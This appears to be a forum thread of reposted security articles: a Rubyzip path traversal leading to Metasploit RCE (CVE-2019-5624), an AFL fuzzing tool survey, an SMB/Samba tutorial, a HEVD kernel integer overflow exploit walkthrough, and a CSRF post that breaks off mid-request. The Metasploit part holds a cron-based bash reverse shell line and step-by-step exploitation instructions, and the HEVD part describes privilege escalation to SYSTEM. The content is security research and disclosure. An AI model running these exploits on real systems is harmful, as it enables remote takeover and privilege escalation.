Thanks to Pathname's interpretation of the ../, the argument to Rubyzip's Entry#extract call does not contain any path traversal payloads, which results in a mistakenly supposed "safe" path. Since the gem does not perform any validation, the exploitation does not even require this unexpected path concatenation.

From Arbitrary File Write to RCE (RoR Style)

Apart from the usual *nix and Windows specific techniques (like writing a new cronjob or exploiting custom scripts), we were interested in understanding how we could leverage this bug to achieve RCE in the context of a RoR application. Since our target was running in production environments, RoR classes were cached on first usage via the cache_classes directive. During the time allocated for the engagement we didn't find a reliable way to load/inject arbitrary code at runtime via file write without requiring a RoR reboot. However, we did verify in a local testing environment that chaining together a Denial of Service vulnerability and a full path disclosure of the web app root can be used to trigger a web server reboot and achieve RCE via the aforementioned zip handling vulnerability.

The official documentation explains that:

After it loads the framework plus any gems and plugins in your application, Rails turns to loading initializers. An initializer is any file of ruby code stored under /config/initializers in your application. You can use initializers to hold configuration settings that should be made after all of the frameworks and plugins are loaded.

Using this feature, an attacker with the right privileges can add a malicious .rb in the /config/initializers folder, which will be loaded at web server (re)boot.

Attacking the attackers. Metasploit Authenticated RCE (CVE-2019-5624)

Just after the end of the engagement, and with the approval of our customer, we started looking at popular software that was likely affected by the Rubyzip bug. As we were brainstorming potential targets, an icon on one of our VMs caught our attention: Metasploit Framework.

Going through the source code, we were able to quickly identify several files that use the Rubyzip library to create ZIP files. Since our vulnerability resides in the extract function, we recalled an option to import a ZIP workspace from previous MSF versions or from different instances.
We identified the corresponding code path in the zip.rb file (line 157) that is responsible for importing a Metasploit ZIP file:

data.entries.each do |e|
  target = ::File.join(@import_filedata[:zip_tmp], e.name)
  data.extract(e, target)

As with the vanilla Rubyzip example, creating a ZIP file containing a path traversal payload and embedding a valid MSF workspace (an XML file containing the exported info from a scan) made it possible to obtain a reliable file-write primitive. Since the extraction is done as root, we could easily obtain remote command execution with high privileges using the following steps:

1. Create a file with the following content:
   * * * * * root /bin/bash -c "exec /bin/bash 0</dev/tcp/172.16.13.144/4444 1>&0 2>&0 0<&196;exec 196<>/dev/tcp/172.16.13.144/4445; bash <&196 >&196 2>&196"
2. Generate the ZIP archive with the path traversal payload: python evilarc.py exploit --os unix -p etc/cron.d/
3. Add a valid MSF workspace to the ZIP file (in order to have MSF extract it; otherwise it will refuse to process the ZIP archive)
4. Set up two listeners, one on port 4444 and the other on port 4445 (the one on port 4445 will get the reverse shell)
5. Log in to the MSF web interface
6. Create a new "Project"
7. Select "Import", "From file", choose the evil ZIP file and finally click the "Import" button
8. Wait for the import process to finish
9. Enjoy your reverse shell

Conclusions

In case you are using Rubyzip, check the library usage and perform additional validation against the entry name and the destination path before calling Entry#extract. Here is a small recap of the different scenarios (as of Rubyzip v1.2.2):

Usage               | Input by user?                   | Vulnerable to path traversal?
entry.extract(path) | yes (path)                       | yes
entry.extract(path) | partially (path is concatenated) | maybe
entry.extract()     | partially (entry name)           | no
entry.extract()     | no                               | no

If you're using Metasploit, it is time to patch. We look forward to seeing an msf module for CVE-2019-5624.

Credits and References

Credit for the research and bugs go to @voidsec and @polict. This work has been performed during a customer engagement and Doyensec 25% Research Time. As such, we would like to thank our customer and the Metasploit maintainers for their support. If you're interested in the topic, take a look at the following resources:

- Rubyzip Library
- Ruby on Rails Guides
- Attacking Ruby on Rails Applications
- 1997 Portable BBS Hacking (or when Zip Slip was actually invented)
- Evilarc blog post (or 2019 and this post is still relevant)

Sursa: https://blog.doyensec.com/2019/04/24/rubyzip-bug.html
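The defensive validation recommended in the conclusions is cheap to implement in any language. A minimal Python sketch of the same idea, resolving each entry's final destination and refusing anything that escapes the extraction root (as the Rubyzip comments themselves warn, this does not address symlinked destinations):

import os
import zipfile

def safe_extract(zip_path, dest_dir):
    dest_dir = os.path.realpath(dest_dir)
    with zipfile.ZipFile(zip_path) as z:
        for name in z.namelist():
            # Resolve where this entry would actually land.
            target = os.path.realpath(os.path.join(dest_dir, name))
            if target != dest_dir and not target.startswith(dest_dir + os.sep):
                raise ValueError(f"blocked path traversal entry: {name!r}")
        z.extractall(dest_dir)

safe_extract("absolutepath.zip", "/tmp/uploads/random_uuid")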
-
Zoo AFL
d1g1, Digital Security company blog, Information Security

In this article, we're going to talk not about the classical AFL itself but about utilities designed for it and its modifications, which, in our view, can significantly improve the quality of fuzzing. If you want to know how to boost AFL and how to find more vulnerabilities faster, keep on reading!

What is AFL and What is it Good for?

AFL is a coverage-guided, or feedback-based, fuzzer. More about these concepts can be found in a good paper, "Fuzzing: Art, Science, and Engineering". Let's wrap up the general information about AFL:

- It modifies the executable file to find out how input influences coverage.
- It mutates input data to maximize coverage.
- It repeats the preceding steps to find inputs where the program crashes.
- It's highly effective, which is proven by practice.
- It's very easy to use.

Here's a graphic representation:

If you don't know what AFL is, here is a list of helpful resources for you to start:

- The official page of the project.
- afl-training — a short intro to AFL.
- afl-demo — a simple demo of fuzzing C++ programs with AFL.
- afl-cve — a collection of the vulnerabilities found with AFL (hasn't been updated since 2017).
- Here you can read about the stuff AFL adds to a program during its build.
- A few useful tips about fuzzing network applications.

At the moment this article was being written, the latest version of AFL was 2.52b. The fuzzer is in active development, and over time some side developments get incorporated into the main AFL branch and grow irrelevant. Today, we can name several useful accessory tools, which are listed in the following chapter.

Some AFL users noted that its author, Michal Zalewski, had apparently abandoned the project, since the last modifications date back to November 5, 2017. This may be connected to him leaving Google and working on some new projects. So, users started to make new patches themselves for the last current version, 2.52b. There are also different variations and derivatives of AFL, which allow fuzzing Python, Go, Rust, OCaml, GCJ Java, kernel syscalls, or even entire VMs.

Accessory tools

For this chapter, we've collected various scripts and tools for AFL and divided them into several categories.

Crash processing

- afl-utils — a set of utilities for automatic processing/analysis of crashes and reducing the number of test cases.
- afl-crash-analyzer — another crash analyzer for AFL.
- fuzzer-utils — a set of scripts for the analysis of results.
- atriage — a simple triage tool.
- afl-kit — afl-cmin on Python.
- AFLize — a tool that automatically generates builds of debian packages suitable for AFL.
- afl-fid — a set of tools for working with input data.

Work with code coverage

- afl-cov — provides human-friendly data about coverage.
- count-afl-calls — ratio assessment. The script counts the number of instrumentation blocks in the binary.
- afl-sancov — like afl-cov but uses a clang sanitizer.
- covnavi — a script for covering code and analysis by the Cisco Talos group.
- LAF LLVM Passes — something like a collection of patches for AFL that modify the code to make it easier for the fuzzer to find branches.

A few scripts for the minimization of test cases

- afl-pytmin — a wrapper for afl-tmin that tries to speed up the minimization of test cases by using many CPU cores.
- afl-ddmin-mod — a variation of afl-tmin based on the ddmin algorithm.
- halfempty — a fast utility for minimizing test cases by Tavis Ormandy, based on parallelization.
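Most of the distributed-execution helpers listed in the next section are thin wrappers around AFL's built-in parallel mode (one -M master plus -S slaves sharing a sync directory). A minimal Python launcher sketch, assuming afl-fuzz is on PATH and a ./target binary that reads the file passed as @@; real launchers additionally detach each instance into screen/tmux or redirect its UI output:

import shlex
import subprocess

N = 4  # number of afl-fuzz instances to run on this machine
procs = []
for i in range(N):
    role = "-M" if i == 0 else "-S"           # one master, N-1 slaves
    cmd = f"afl-fuzz -i in -o sync {role} fuzzer{i:02d} -- ./target @@"
    procs.append(subprocess.Popen(shlex.split(cmd)))

for p in procs:
    p.wait()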
Distributed execution

- disfuzz-afl — distributed fuzzing for AFL.
- AFLDFF — AFL distributed fuzzing framework.
- afl-launch — a tool for the execution of many AFL instances.
- afl-mothership — management and execution of many synchronized AFL fuzzers on the AWS cloud.
- afl-in-the-cloud — another script for running AFL in AWS.
- VU_BSc_project — fuzz testing of open-source libraries with libFuzzer and AFL.

A very good article titled "Scaling AFL to a 256 thread machine" was published recently.

Deployment, management, monitoring, reporting

- afl-other-arch — a set of patches and scripts for easily adding support for various non-x86 architectures to AFL.
- afl-trivia — a few small scripts to simplify the management of AFL.
- afl-monitor — a script for monitoring AFL.
- afl-manager — a web server in Python for managing multi-afl.
- afl-tools — a Docker image with afl-latest, afl-dyninst, and Triforce-afl.
- afl-remote — a web server for the remote management of AFL instances.

AFL Modifications

AFL had a very strong impact on the community of vulnerability researchers and on fuzzing itself. It's not surprising at all that after some time people started making modifications inspired by the original AFL. Let's have a look at them. In different situations, each of these modifications has its own pros and cons compared to the original AFL. Almost all mods can be found at hub.docker.com.

What are these modifications for? Broadly, they fall into two groups: increasing the speed and/or code coverage (through algorithms or through the environment: OS and hardware), and working without source code (through code emulation, or through static or dynamic code instrumentation).

Default modes of AFL operation

Before going on to examine different modifications and forks of AFL, we have to talk about two important modes, which were once modifications themselves but were eventually incorporated upstream: Syzygy mode and QEMU mode.

Syzygy mode — the mode of working via instrument.exe:

instrument.exe --mode=afl --input-image=test.exe --output-image=test.instr.exe

Syzygy allows statically rewriting PE32 binaries for AFL, but it requires symbols and additional development effort to make WinAFL kernel-aware.

Qemu mode — how it works under QEMU can be seen in "Internals of AFL fuzzer — QEMU Instrumentation". Support for working with binaries via QEMU was added to upstream AFL in version 1.31b. AFL's QEMU mode works by adding instrumentation into the qemu TCG (tiny code generator) binary translation engine. For that, AFL has a qemu build script which extracts the sources of a specific qemu version (2.10.0), applies several small patches to them, and builds for a defined architecture. The result is a file called afl-qemu-trace, which is in fact the qemu user-mode emulation binary (user-mode emulation runs only executable ELF files). Thus, it is possible to use feedback-driven fuzzing on ELF binaries for the many different architectures supported by qemu. Plus, you get all the cool AFL tools, from the monitor with information about the current session to advanced stuff like afl-analyze. But you also get the limitations of qemu. Also, if a file is built with a toolchain that uses hardware SoC features which qemu does not support, fuzzing will be interrupted as soon as such a specific instruction is executed or a specific MMIO is used. There's also another interesting fork of the qemu mode, where the speed was increased 3-4 times with TCG code instrumentation and caching.

Forks

The appearance of AFL forks is first of all related to changes and improvements of the algorithms of the classic AFL.
- pe-afl — a modification for fuzzing PE files without source code on Windows. For its operation, the fuzzer analyzes a target program with IDA Pro and generates the information for subsequent static instrumentation. An instrumented version is then fuzzed with AFL.
- afl-cygwin — an attempt to port the classic AFL to Windows with Cygwin. Unfortunately, it has many bugs, it's very slow, and its development has been abandoned.
- AFLFast (extends AFL with Power Schedules) — one of the first AFL forks. It adds heuristics which allow it to go through more paths in a short time period.
- FairFuzz — an extension for AFL that targets rare branches.
- AFLGo — an extension for AFL meant for reaching certain parts of code instead of full program coverage. It can be used for testing patches or newly added fragments of code.
- PerfFuzz — an extension for AFL that looks for test cases which could significantly slow down the program.
- Pythia — an extension for AFL meant to forecast how hard it is to find new paths.
- Angora — one of the latest fuzzers, written in Rust. It uses new strategies for mutation and increasing coverage.
- Neuzz — fuzzing with neural networks.
- UnTracer-AFL — integration of AFL with UnTracer for effective tracing.
- Qsym — Practical Concolic Execution Engine Tailored for Hybrid Fuzzing. Essentially, it is a symbolic execution engine (its basic components are realized as a plugin for Intel Pin) that together with AFL performs hybrid fuzzing. This is a stage in the evolution of feedback-based fuzzing and calls for a separate discussion. Its main advantage is that it can do concolic execution relatively fast. This is due to the native execution of commands without an intermediate representation of the code, snapshots, and some heuristics. It uses the old Intel Pin (due to support problems between libz3 and other DBTs) and currently can work with ELF x86 and x86_64 binaries.
- Superion — a greybox fuzzer whose obvious advantage is that, along with an instrumented program, it also takes a specification of the input data as an ANTLR grammar and then performs mutations with the help of this grammar.
- AFLSmart — another greybox fuzzer. As input, it takes a specification of the input data in the format used by the Peach fuzzer.

There are many research papers dedicated to the implementation of new approaches and fuzzing techniques where AFL is modified. Since only the white papers are available, we didn't even bother listing those; you can google them if you want. For example, some of the latest are CollAFL: Path Sensitive Fuzzing, EnFuzz, "Efficient approach to fuzzing interpreters", and ML for AFL.

Modifications based on Qemu

- TriforceAFL — AFL/QEMU fuzzing with full emulation of a system. A fork by NCC Group. It allows fuzzing an entire OS in qemu mode. It is realized with a special instruction (aflCall (0f 24)) added to the QEMU x64 CPU. Unfortunately, it's no longer supported; the last supported version of AFL is 2.06b.
- TriforceLinuxSyscallFuzzer — fuzzing of Linux system calls.
- afl-qai — a small demo project with QEMU Augmented Instrumentation (qai).

A modification based on KLEE

- kleefl — for generating test cases by means of symbolic execution (very slow on big programs).

A modification based on Unicorn

- afl-unicorn — allows fuzzing fragments of code by emulating them on Unicorn Engine. We successfully used this variation of AFL in our practice, on code regions of a certain RTOS that ran on a SoC, so we couldn't use QEMU mode.
The use of this modification is justified when we don't have sources (we can't build a stand-alone binary for analyzing the parser) and the program doesn't take input data directly (for example, the data is encrypted or is a signal sample, as in a CGC binary). In that case we can reverse-engineer the binary and find the likely parser functions where the data is processed in a format convenient for the fuzzer. This is the most general/universal modification of AFL, i.e. it allows fuzzing anything. It is independent of architecture, sources, input data format, and binary format (the most striking example is bare-metal: just fragments of code from a controller's memory). The researcher first examines the binary and writes a fuzzer which emulates the state at the entry of the parser procedure. Obviously, unlike classic AFL, this requires a certain amount of binary analysis. For bare-metal firmware, like Wi-Fi or baseband, there are certain drawbacks that you need to keep in mind:

- We have to localize the checksum check.
- Keep in mind that the state of the fuzzer is the memory state saved in the memory dump, which can prevent the fuzzer from reaching certain paths.
- There's no sanitization of calls to dynamic memory, but it can be implemented manually, and it will depend on the RTOS (has to be researched).
- Inter-task RTOS interaction is not emulated, which can also prevent finding certain paths.

Examples of working with this modification: "afl-unicorn: Fuzzing Arbitrary Binary Code" and "afl-unicorn: Part 2 — Fuzzing the 'Unfuzzable'".

Before we go on to the modifications based on dynamic binary instrumentation (DBI) frameworks, let's not forget that the highest speed among these frameworks is shown by DynamoRIO, then Dyninst, and finally PIN.

PIN-based modifications

- aflpin — AFL with Intel PIN instrumentation.
- afl_pin_mode — another AFL instrumentation realized through Intel PIN.
- afl-pin — AFL with PINtool.
- NaFl — a clone (of the basic core) of the AFL fuzzer.
- PinAFL — the author of this tool tried to port AFL to Windows for the fuzzing of already-compiled binaries. It seems it was done overnight just for fun; the project has never gone any further. The repository doesn't have sources, only compiled binaries and launch instructions. We don't know which version of AFL it's based on, and it only supports 32-bit applications.

As you can see, there are many different modifications, but they are not very useful in real life.

Dyninst-based modifications

- afl-dyninst — American Fuzzy Lop + Dyninst == AFL blackbox fuzzing. The feature of this version is that the researched program (without source code) is first instrumented statically (static binary instrumentation, static binary rewriting) with Dyninst, and is then fuzzed with the classic AFL, which thinks the program was built with afl-gcc/afl-g++/afl-as. As a result, it works with very good performance without source code: it used to run at 0.25x speed compared to a native compile. It has a significant advantage compared to QEMU mode: it allows the instrumentation of dynamically linked libraries, while QEMU can only instrument the base executable statically linked with its libraries. Unfortunately, it's currently only relevant for Linux. Windows support requires changes to Dyninst itself, which is being worked on. There's also another fork with improved speed and certain features (support for the AARCH64 and PPC architectures).

Modifications based on DynamoRIO

- drAFL — AFL + DynamoRIO: fuzzing without sources on Linux.
- afl-dr — another realization based on DynamoRIO, which is very well described on Habr.
- afl-dynamorio — a modification by vanhauser-thc. Here's what he says about it: "run AFL with DynamoRIO when normal afl-dyninst is crashing the binary and qemu mode -Q is not an option". It supports ARM and AARCH64. Regarding performance: DynamoRIO is about 10 times slower than Qemu, 25 times slower than dyninst, but about 10 times faster than Pintool.
- WinAFL — the most famous AFL fork for Windows (DynamoRIO, also syzygy mode). It was only a matter of time for this mod to appear, because many wanted to try AFL on Windows and apply it to apps without sources. Currently, this tool is being actively improved, and regardless of a relatively outdated AFL code base (2.43b at the time of writing), it has helped find several vulnerabilities (CVE-2016-7212, CVE-2017-0073, CVE-2017-0190, CVE-2017-11816). Specialists from Google's Project Zero team and the MSRC Vulnerabilities and Mitigations team are working on this project, so we can hope for further development. Instead of compile-time instrumentation, the developers used dynamic instrumentation (based on DynamoRIO), which significantly slows down the execution of the analyzed software, but the resulting overhead (about 2x) is comparable to that of the classic AFL in binary mode. They also solved the problem of fast process launch, calling it persistent fuzzing mode: they choose the function to fuzz (by the offset inside the file or by the name of a function present in the export table) and instrument it so that it can be called in a loop, running several input data samples without restarting the process. An article came out recently describing how the authors found around 50 vulnerabilities in about 50 days using WinAFL, and shortly before it was published, Intel PT mode had been added to WinAFL; details can be found here.

An advanced reader may have noticed that there are modifications for all the popular instrumentation frameworks except Frida. The only mention of the use of Frida with AFL was found in "Chizpurfle: A Gray-Box Android Fuzzer for Vendor Service Customizations". A version of AFL with Frida would be really useful, because Frida supports several RISC architectures. Many researchers are also looking forward to the release of the Skorpio DBI framework by the creator of Capstone, Unicorn, and Keystone. Based on this framework, the authors have already created a fuzzer (Darko) and, according to them, successfully use it to fuzz embedded devices. More on this can be found in "Digging Deep: Finding 0days in Embedded Systems with Code Coverage Guided Fuzzing".

Modifications based on processor hardware features

When it comes to AFL modifications with support for processor hardware features, first of all this allows fuzzing kernel code, and secondly it allows much faster fuzzing of apps without source code. And of course, speaking about processor hardware features, we are most of all interested in Intel PT (Processor Trace). It is available from the 6th generation of processors onwards (approximately since 2015). So, in order to be able to use the fuzzers listed below, you need a processor supporting Intel PT.

- WinAFL-IntelPT — a third-party WinAFL modification that uses Intel PT instead of DynamoRIO.
- kAFL — an academic project aimed at solving the coverage-guided problem for OS-independent fuzzing of the kernel. The problem is solved by using a hypervisor and Intel PT.
More about it can be found in the white paper "kAFL: Hardware-Assisted Feedback Fuzzing for OS Kernels".

Conclusion

As you can see, the area of AFL modifications is actively evolving. Still, there is room for experiments and creative solutions; you can create a useful and interesting new modification yourself. Thanks for reading us and good luck with fuzzing!

Co-author: Nikita Knyzhov (presler)

P.S. Thanks to the research center team, without whom this article would be impossible.

Sursa: https://habr.com/ru/company/dsec/blog/449134/
-
Make Redirection Evil Again: URL Parser Issues in OAuth

Xianbo Wang (1), Wing Cheong Lau (1), Ronghai Yang (1, 2), and Shangcheng Shi (1)
(1) The Chinese University of Hong Kong, (2) Sangfor Technologies Co., Ltd

Download: https://i.blackhat.com/asia-19/Fri-March-29/bh-asia-Wang-Make-Redirection-Evil-Again-wp.pdf
-
Understanding the Movfuscator
Nytro replied to Nytro's topic in Reverse engineering & exploit development
Yes, mov (but other instructions as well) is Turing complete.
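The core trick behind the movfuscator, sketched in Python rather than x86: every conditional jump is replaced by data movement, selecting between precomputed outcomes by indexing with the condition instead of branching. This is a toy illustration of the idea, not the actual tool's output:

# Branching version:
def abs_branchy(x):
    if x < 0:
        return -x
    return x

# "mov-only" style: compute both outcomes unconditionally, then
# *select* one by indexing with the condition - a pure data move,
# analogous to mov reg, [table + cond*4] in x86.
def abs_movstyle(x):
    outcomes = [x, -x]
    return outcomes[x < 0]  # bool indexes as 0 or 1

assert all(abs_branchy(v) == abs_movstyle(v) for v in (-3, 0, 7))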
Network Basics for Hackers: Server Message Block (SMB) and Samba
March 4, 2019 | OTW

Welcome back, my aspiring cyber warriors!

This series is intended to provide the aspiring cyber warrior with all the information you need to function in cyber security from a network perspective, much like my "Linux Basics for Hackers" is for Linux. In this tutorial we will address Server Message Block, or SMB. Although most people have heard the acronym, few really understand this key protocol. It may be the most impenetrable and least understood of the communication protocols, but it is critical to the smooth functioning of your network and its security.

What is SMB?

Server Message Block (SMB) is an application layer (layer 7) protocol that is widely used for file, port, named pipe and printer sharing. It is a client-server communication protocol. It enables users and applications to share resources across their LAN. This means that if one system has a file that is needed by another system, SMB enables the user to share their files with other users. In addition, SMB can be used to share a printer over the Local Area Network (LAN). SMB over TCP/IP uses port 445.

SMB is a client-server, request-response protocol. The diagram below illustrates the request-response nature of this protocol. Clients connect to servers via TCP/IP or NetBIOS. Once the two have established a connection, the clients can send commands to access shares, read and write files, and access printers. In general, SMB enables the client to do everything they normally do on their system, but over the network. SMB was first developed by IBM in the 1980's (the dominant computer company from the 1950's through the mid 1990's) and then adopted and adapted by Microsoft for its Windows operating system.

CIFS

The terms CIFS and SMB are often confused by the novice and cyber security professional alike. CIFS stands for "Common Internet File System." CIFS is a dialect or a form of SMB. That is, CIFS is a particular implementation of the Server Message Block protocol. It was developed by Microsoft to be used on early Microsoft operating systems. CIFS is now generally considered obsolete, as it has been supplanted by more modern implementations of SMB, including SMB 2.0 (introduced in 2006 with Windows Vista) and SMB 3.0 (introduced with Windows 8 and Server 2012).

Vulnerabilities

SMB in Windows and Samba in Linux/Unix systems (see below) has been a major source of critical vulnerabilities on both of these operating systems in the past and will likely continue to be a source of critical vulnerabilities in the future. Two of the most critical Windows vulnerabilities over the last decade or so have been SMB vulnerabilities. These include MS08-067 and, more recently, the EternalBlue exploit developed by the NSA. In both cases, these exploits enabled the attacker to send specially crafted packets to SMB and execute remote code with system privileges on the target system. In other words, armed with these exploits, the attacker could take over any system and control everything on it. For a detailed look at the EternalBlue exploit against Windows 7 by Metasploit, see my tutorial here. In addition, using Metasploit, an attacker can set up a fake SMB server to capture credentials.

The Linux/Unix implementation of SMB, Samba, has had its own problems as well. Although far from a complete list of vulnerabilities and exploits, when we search Metasploit 5 for smb exploits we find the considerable list below.
Note the highlighted, infamous MS08-067 exploit, responsible for the compromise of millions of Windows Server 2003, Windows XP and earlier systems. Near the bottom of the list you can find the NSA's EternalBlue exploit (MS17-010), which the NSA used to compromise an untold number of systems and which--after its release by Shadowbrokers--was used by such ransomware as Petya and WannaCry. In the Network Forensics section here at Hackers-Arise, I have a detailed packet-level analysis of the EternalBlue exploit against SMB on a Windows 7 system.

Samba

While SMB was originally developed by IBM and then adopted by Microsoft, Samba was developed to mimic a Windows server on a Linux/UNIX system. This enables Linux/UNIX systems to share resources with Windows systems as if they were Windows systems. Sometimes the best way to understand a protocol or system is simply to install and implement it yourself. Here, we will install, configure and implement Samba on a Linux system. As usual, I will be using Kali--which is built upon Debian--for demonstration purposes, but this should work on any Debian system including Ubuntu, and usually on any of the vast variety of *NIX systems.

Step #1: Download and Install Samba

The first step, if it is not already installed, is to download and install Samba. It is in most repositories, so simply enter the command:

kali > apt-get install samba

Step #2: Start Samba

Once Samba has been downloaded and installed, we need to start it. Samba is a service in Linux, and like any service, we can start it with the service command:

kali > service smbd start

Note that the service is not called "Samba" but rather smbd, the smb daemon.

Step #3: Configure Samba

Like nearly every service or application in Linux, configuration can be done via a simple text file. For Samba that text file is at /etc/samba/smb.conf. Let's open it with any text editor:

kali > leafpad /etc/samba/smb.conf

We can configure Samba on our system by simply adding the following lines to the end of our configuration file. In our example, we begin by naming our share ([HackersArise_share]), provide an explanatory comment (comment = Samba on Hackers-Arise), provide a path to our share (path = /home/OTW/HackersArise_share), determine whether the share is read only (read only = no), and determine whether the share is browsable (browsable = yes):

[HackersArise_share]
comment = Samba on Hackers-Arise
path = /home/OTW/HackersArise_share
read only = no
browsable = yes

Note that the share is in the user's home directory (/home/OTW/HackersArise_share) and we have the option to make the share "read only".

Step #4: Creating a share

Now that we have configured Samba, we need to create a share. A "share" is simply a directory and its contents that we make available to other users and applications on the network. The first step is to create a directory using mkdir in the home directory of the user. In this case, we will create a directory for user OTW called HackersArise_share:

kali > mkdir /home/OTW/HackersArise_share

Once that directory has been created, we need to give every user access to it by changing its permissions with the chmod command:

kali > chmod 777 /home/OTW/HackersArise_share

Now, we need to restart Samba to pick up the changes to our configuration file and our new share:

kali > service smbd restart

With the share created, from any Windows machine on the network you can access that share by simply navigating via the File Explorer to the share, entering the IP address and the name of the share, such as:

\\192.168.1.101\HackersArise_share
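To see the same share from the client side programmatically, here is a hedged Python sketch using impacket, a third-party library (pip install impacket). The IP address and credentials are placeholders for the Samba box configured above:

from impacket.smbconnection import SMBConnection

# Placeholders: the Samba server set up above and a valid user on it.
conn = SMBConnection(remoteName="KALI", remoteHost="192.168.1.101")
conn.login("OTW", "password")

# Enumerate shares over SMB; HackersArise_share should appear here.
for share in conn.listShares():
    print(share["shi1_netname"][:-1])  # share names are NUL-terminated

conn.logoff()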
Conclusion

SMB is a critical protocol on most computer systems for file, port, printer and named pipe sharing. It is little understood and little appreciated by most cyber security professionals, but it can be a critical vulnerability on these systems, as shown by MS08-067 and the NSA's EternalBlue. The better we understand these protocols, the better we can protect our systems from attack and compromise.

Sursa: https://www.hackers-arise.com/single-post/2019/03/04/Network-Basics-for-Hackers-Server-Message-Block-SMB
-
Windows Kernel Exploitation Part 3: Integer Overflow
By Himanshu Khokhar | April 4, 2019 | In Exploit Development, Integer Overflow, Kernel Exploitation, Reverse Engineering

Introduction

Welcome to the third part of the Windows Kernel Exploitation series. In this part, we are going to exploit an integer overflow in the HackSysExtremeVulnerableDriver (HEVD).

What exactly is an integer overflow?

For those who do not know about integer overflows, you might be wondering how an integer can overflow. Well, the integer itself does not overflow. The CPU stores integers in fixed-size storage (we are not talking about the heap or the like here). If you are familiar with the C/C++ programming language or similar languages, you might recall data types and how each data type has a specific fixed size. On most machines and OSes, char is 1 byte and int is 4 bytes long. What that means is that a char data type can hold values that are 8 bits in size, ranging from 0 to 255, or in the case of signed values, -128 to 127. The same goes for integers: on machines where int is 4 bytes in size, it can hold values from 0 to 2^32 - 1 (in the case of unsigned values).

Now, let us consider we are using an unsigned int, whose largest value can be 2^32 - 1, or 0xFFFFFFFF. What happens when you add 1 to this? Since all 32 bits are set to one, adding one would make it a 33-bit value, but since the storage can hold only 32 bits, the low 32 bits are all set to 0. When doing operations, the CPU generally loads the number into a 32-bit register (talking about x86 here), and adding 1 sets the Carry Flag while the register holds the value 0, as all 32 bits are now 0. Now, suppose there is a check that the supplied value must not be greater than, let's say, 10: a value that has wrapped around to 0 will pass that check, even though the caller actually supplied an enormous number. To understand this in more detail, let us have a look at the vulnerability and see how we can exploit an integer overflow issue in HEVD to gain code execution in the Windows kernel.

Vulnerability

Now that we have that cleared up, let us have a look at the vulnerable code (function TriggerIntegerOverflow, located in IntegerOverflow.c). Initially, the function creates an array of ULONGs which can hold 512 elements (BufferSize is set to 512 in the common.h header file).

Vulnerable function in IntegerOverflow.c

The kernel then checks if the buffer resides in user land, and then it prints some information for us. Pretty helpful. Once that has been done, the kernel checks whether the size of the data (along with the size of the Terminator, which is 4 bytes) is more than that of KernelBuffer. If it is, then it exits without copying the user-land buffer into the kernel-land buffer.

Size checks

But if that is not the case, then it goes ahead and copies the data to the kernel buffer. Another thing to note here is that IF it encounters the BufferTerminator in the user-land buffer, it stops copying and moves ahead. So, we need to put the BufferTerminator at the end of our user-mode buffer.

Copying user-mode data to kernel-mode function stack

The Overflow

The problem in Line 100 of IntegerOverflow.c is that if we supply the size parameter as 0xFFFFFFFC, then when the code adds the size of BufferTerminator (which is 4 bytes), the effective size becomes 0xFFFFFFFC + 4 = 0x00000000, which is less than the size of KernelBuffer. We therefore pass the data size check and move on to the copying of the buffer into kernel mode.

Verifying the bug

Now, to verify this, we are going to send our buffer to HEVD, but pass 0xFFFFFFFC as the size of the buffer.
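To make the trigger concrete, here is a minimal user-mode sketch in Python using ctypes. This is an illustration only: the IOCTL constant below is a placeholder (take the real value for the integer overflow handler from HEVD's header files), and the terminator bytes should match HEVD's BufferTerminator constant in common.h.

from ctypes import windll, byref, c_ulong, c_void_p, create_string_buffer

GENERIC_READ_WRITE = 0xC0000000
OPEN_EXISTING = 3
IOCTL_INT_OVERFLOW = 0xDEADBEEF   # PLACEHOLDER - take the real code from HEVD's headers
TERMINATOR = b"\xb0\xb0\xd0\xba"  # 0xBAD0B0B0 little-endian; verify against common.h

kernel32 = windll.kernel32
kernel32.CreateFileA.restype = c_void_p  # keep the handle intact on 64-bit Python

handle = kernel32.CreateFileA(b"\\\\.\\HackSysExtremeVulnerableDriver",
                              GENERIC_READ_WRITE, 0, None, OPEN_EXISTING, 0, None)

buf = create_string_buffer(b"A" * 4 + TERMINATOR)  # small data + terminator
returned = c_ulong(0)

# The 4th argument is the attacker-controlled size: 0xFFFFFFFC + 4 wraps to 0,
# which slips past the kernel's size check.
kernel32.DeviceIoControl(handle, IOCTL_INT_OVERFLOW, buf, 0xFFFFFFFC,
                         None, 0, byref(returned), None)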
For now, we will not place a huge buffer and crash the kernel; rather, we will just send a small buffer and confirm.

PoC of triggering Integer Overflow

Since we know the buffer is 512 ULONGs, we will just send this data and see what the kernel does. Note: here, the focus is on the 4th parameter of DeviceIoControl rather than on the actual data. Finally, send this buffer to HEVD and see what happens.

Successfully triggered Integer Overflow

As you can see in the picture, the UserBuffer size says 0xFFFFFFFC, but we still managed to bypass the size validity check and trigger the integer overflow. Having confirmed that supplying 0xFFFFFFFC bypasses the size check, all that remains is to put a unique pattern after the UserBuffer, and the terminator after that, to find the saved return pointer overwrite. If you do not know how to do that, please read Part 1 of this series, where I have shown how to do this. Let us move ahead and exploit it.

Exploiting the Overflow

All that now remains is to overwrite the saved return address with the TokenStealingPayloadWin7 shellcode provided in HEVD, and you are done. Note: you may need to modify the shellcode a bit to keep it from crashing. This is your homework.

Getting the shell

Let us first verify whether I am a regular user or not.

Regular User

As can be seen, I am just a regular user. After we run our exploit, I become nt authority/system.

Successful exploitation of Integer Overflow

That's it for this part, folks; see you in the next part. You can find the whole code in my code repo here.

References
HackSysTeam
FuzzySecurity

Sursa: https://pwnrip.com/windows-kernel-exploitation-part-3-integer-overflow/
-
Same-Origin Policy: From birth until today

In this blog post I will talk about Cross-Origin Resource Sharing (CORS) between sites on different domains, and how the web browser's Same Origin Policy is meant to facilitate CORS in a safe way. I will present data on cross-origin behaviour of various versions of four major browsers, dating back to 2004. I will also talk about recent security bugs (CVE-2018-18511 and CVE-2019-9797) I discovered in the latest versions of Firefox, Chrome and Opera which allow stealing sensitive images via Cross-Site Request Forgery (CSRF).

Overview
- Motivation
  - An attack…
  - … and the defence
- What is CORS, SOP, preflight checks and all this jibberish you're talking about?
  - CORS headers
  - Why GET should be "safe"
- SOP behaviour across browsers
  - Browsers tested
  - Test setup
    - Server CORS modes
    - Cross-origin request methods
    - Requested targets
  - Results
- Implications
- Tools used
- References

Motivation

An attack…

Cross-Site Request Forgery (CSRF or XSRF) is arguably one of the most common issues we encounter during web app testing, and one of the trickiest to protect against. The attack goes as follows: a malicious user, Eve, has an account with bank.example with account number 123456. Eve wants to steal money from another customer, Bob, and knows that the HTTP request Bob would send to bank.example to transfer $10000 to Eve is as follows:

POST /transfer.php HTTP/1.1
Host: bank.example
